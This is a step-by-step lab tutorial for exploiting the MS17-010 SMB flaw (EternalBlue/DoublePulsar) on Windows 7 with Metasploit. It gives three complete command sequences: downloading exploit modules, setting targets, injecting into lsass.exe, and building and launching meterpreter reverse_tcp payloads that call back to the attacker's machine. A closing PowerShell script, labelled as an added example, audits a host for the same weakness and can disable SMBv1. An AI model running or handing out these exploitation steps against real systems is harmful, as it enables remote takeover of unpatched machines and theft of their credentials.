SMB (MS17-010) remote command execution with msf
1. Environment used this time:
Kali (2016.2) 32-bit, IP address: 192.168.1.104
Target machine: Win7 SP1 x64 (firewall disabled), IP address: 192.168.1.105
The specific steps are as follows:
Install wine32 on the Kali system:
apt-get install wine32
Run cmd.exe with wine32 (this initialises the wine prefix):
wine cmd.exe
exit    // leave the wine shell
Download the exploit script with git clone:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
Then copy the script into /usr/share/metasploit-framework/modules/exploits/windows/smb:
cd Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
Start msf, then do the following series of settings:
service postgresql start
msfconsole
search eternalblue
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.105
show targets
set target 9
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.1.104
exploit
2. Appendix:
The ms17-010 module in msf:
Prerequisites:
1. gem install ruby_smb    # install the ruby_smb module
2. msfupdate    # update msf
3. msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"    # start msf and load the module
wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb
cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.21
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > exploit
meterpreter > sysinfo
3. Setting up the environment:
Kali 192.168.0.10 (attacker)
Win7 192.168.0.4 (target)
First install wine32 on Kali:
apt-get install wine32 (dpkg --add-architecture i386 && apt-get update && apt-get install wine32)
wine cmd.exe
exit
Download the exploit files: git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Put eternalblue_doublepulsar.rb into /usr/share/metasploit-framework/modules/exploits/windows/smb/
Generate the dll:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.10 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll
Start msfconsole and run reload_all to reload the modules:
use exploit/windows/smb/eternalblue_doublepulsar
set rhost 192.168.0.4
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.10
set lport 4444
exploit
Note: on x86 systems run set PROCESSINJECT lsass.exe (module option: PROCESSINJECT  lsass.exe  wlms.exe  yes  Name of process to inject into (Change to lsass.exe for x64))
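The target in this lab is only reachable because it runs the SMBv1 server unpatched with the firewall off. As an added example that is not part of the original post, the PowerShell below audits a Windows 7 SP1 host for exactly those three conditions and can disable SMBv1 server-side; it assumes an elevated prompt, and the KB ids (KB4012212 security-only, KB4012215 monthly rollup for March 2017) and the LanmanServer\Parameters SMB1 registry value are taken from Microsoft's documentation rather than from this page.

```powershell
# Added example (not from the original post): audit a Windows 7 SP1 host for the
# conditions the MS17-010 lab relies on and optionally disable the SMBv1 server.
# Run from an elevated PowerShell. Assumption: KB4012212 / KB4012215 are the
# March 2017 MS17-010 updates for Windows 7 SP1; a later monthly rollup also
# carries the fix, so "not found" means "verify patch level", not "vulnerable".
param([switch]$Remediate)

$findings = @()
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

# 1. SMBv1 server: on Windows 7 the SMB1 value is absent by default, which means enabled.
$smb1 = (Get-ItemProperty -Path $lanman -Name SMB1 -ErrorAction SilentlyContinue).SMB1
$smb1Enabled = ($null -eq $smb1) -or ($smb1 -ne 0)
if ($smb1Enabled) { $findings += 'SMBv1 server is enabled (the code path MS17-010 abuses)' }

# 2. Patch level: look for either March 2017 package by KB id.
$fix = Get-HotFix -ErrorAction SilentlyContinue |
       Where-Object { $_.HotFixID -eq 'KB4012212' -or $_.HotFixID -eq 'KB4012215' }
if (-not $fix) { $findings += 'Neither KB4012212 nor KB4012215 is installed; verify patch level' }

# 3. Host firewall: the lab turns it off, which exposes TCP/445 to the whole subnet.
$fwState = netsh advfirewall show allprofiles state
if ($fwState -match 'State\s+OFF') { $findings += 'Windows Firewall is OFF on at least one profile' }

if ($findings.Count -eq 0) {
    Write-Output 'No MS17-010 exposure found on this host.'
} else {
    Write-Output 'Findings:'
    $findings | ForEach-Object { Write-Output (' - ' + $_) }
}

# Remediation: SMB1=0 under LanmanServer\Parameters is the documented way to disable
# the SMBv1 server on Windows 7 / 2008 R2 (Set-SmbServerConfiguration only exists on
# Windows 8 / Server 2012 and later). Takes effect after the Server (LanmanServer)
# service restarts or the host reboots.
if ($Remediate -and $smb1Enabled) {
    Set-ItemProperty -Path $lanman -Name SMB1 -Value 0 -Type DWord
    Write-Output 'SMB1=0 written; restart the Server service or reboot to apply.'
}
```

Run it without arguments to get the findings list, and with -Remediate to write the SMB1 value; on the lab target all three findings should appear before the exploit steps above can succeed.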
References:
http://www.cnblogs.com/backlion/p/6804863.html
https://zhuanlan.zhihu.com/p/26770020?utm_source=qq